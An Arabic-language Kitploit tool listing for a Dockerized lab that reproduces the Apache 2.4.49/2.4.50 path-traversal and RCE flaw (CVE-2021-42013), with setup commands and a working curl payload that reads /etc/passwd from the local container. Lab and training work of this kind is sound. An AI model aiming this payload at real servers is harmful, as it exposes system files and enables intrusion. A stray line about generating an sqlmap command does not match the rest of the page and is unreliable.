Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2021-42013-httpd — CVE: 2021-42013 تم الاختبار على: 2.4.49 و 2.4.50 الوصف: ثغرات Path Traversal أو Remote Code Execution في Apache 2.4.49 و 2.4.50 | Kitploit
أدوات/GitHubGitHub/cybfar/cve-2021-42013-httpd
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubcybfar/cve-2021-42013-httpd

cve-2021-42013-httpd

CVE: 2021-42013 تم الاختبار على: 2.4.49 و 2.4.50 الوصف: ثغرات Path Traversal أو Remote Code Execution في Apache 2.4.49 و 2.4.50

عرض المستودع
11منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تحويل الثغرة الأمنية إلى حاوية Docker: cve-2021-42013

يهدف هذا المشروع إلى تحويل ثغرة أمنية معينة إلى حاوية Docker. الهدف هو إنشاء بيئة معزولة يمكن من خلالها استغلال الثغرة واختبارها بطريقة آمنة.

التطبيق المعرض للخطر

Apache HTTP Server 2.4.50 - Remote Code Execution && Path Transversal

التثبيت

لتشغيل هذا المشروع، يجب أن يكون لديك على جهازك:

  • Docker
  • Python
  • Curl

بعد تثبيت المتطلبات الأساسية، يمكنك استنساخ مستودع Git هذا على جهازك:

root@kitploit:~
  git clone https://github.com/cybfar/cve-2021-42013-httpd.git

  cd Ccve-2021-42013-httpd

بمجرد دخولك إلى المجلد، قم بتنفيذ الأمر أدناه لإعداد البيئة المعرضة للخطر:

root@kitploit:~
  docker build -t apache-httpd-vuln .
  docker run -p 8000:80 apache-httpd-vuln

ثم انتقل إلى التطبيق على العنوان http://localhost:8000 إذا سارت الأمور بشكل جيد، يجب أن ترى رسالة "It works"

استغلال الثغرة

تنفيذ هذا البايلود (payload) باستخدام curl أدناه يظهر أن الهدف معرض للخطر. سيقوم السكريبت بتوليد أمر sqlmap المناسب لاستغلال الثغرة

root@kitploit:~
  curl -v --path-as-is localhost:8000/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd

يمكن لهذا البايلود الوصول مباشرة إلى معلومات المستخدم في النظام دون موافقته.

بمجرد تفعيل mods cgi أو cgid على الخادم، ستسمح هذه الثغرة للمهاجم بتنفيذ أوامر عشوائية

تنزيل الأداة